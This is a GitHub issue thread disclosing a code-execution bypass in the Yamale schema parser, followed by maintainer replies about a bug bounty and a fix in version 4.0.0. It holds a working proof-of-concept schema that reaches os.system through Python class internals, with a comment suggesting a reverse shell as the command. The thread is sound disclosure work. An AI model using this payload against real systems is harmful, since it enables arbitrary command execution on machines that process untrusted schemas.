RCE Vulnerability in Yamale

[orenbenya1]

this is a bypass for the patch in yamale/syntax/parser.py

we can bypass it simply by adding "str()" to our poc:

POC Example:

# This poc works for both windows and linux.
# It simply runs echo 'test' > test, you can replace the command with 
# reverse shell
schema = yamale.make_schema(content="""
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo 'test' > test") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
age: int(max=200)
height: num()
awesome: bool()
""")

# Create a Data object
data = yamale.make_data(content="""
name: Bill
age: 200
height: 6.2
awesome: True
""")

# Validate data against the schema. Throws a ValueError if data is invalid.
yamale.validate(schema, data)

[mildebrandt]

Thank you for your report and reproduction. We'll take a look at this.

[scriptsrc]

@orenbenya1 - Do you have a BugCrowd account?

https://bugcrowd.com/twentythree-and-me

If you submit a link to this issue on that platform I believe we can send some money your way. I really appreciate your report here.

[dguerri]

Is this bug exploitable on 23andme.com? Are you using this internally?

[mildebrandt]

Hi @orenbenya1 , thank for again for your report. We've mitigated your particular issue in https://github.com/23andMe/Yamale/pull/173, but we realize that fixing eval() can be a game of mack-a-mole. As such, we've also added a warning to several places in the README to indicate users must use schemas from trusted sources.

And thank you @dguerri for your inquiry. Our use of yamale is limited to our build tools, where we control both the schema and the yaml files. We don't use yamale to process any customer data, nor is it used in the operation of 23andme.com.

This fix is available in version 4.0.0. We've incremented the major version due to some of the limitations we're now placing on the schema with the latest fix. There are no known backwards incompatibilities, but some users may have more complex schemas than we test with.

[orenbenya1]

The patch seems to fix it, @scriptsrc I'm glad to help! didn't know you have a bug bounty program, submitted the issue to bugcrowd as you said, thank you so much :)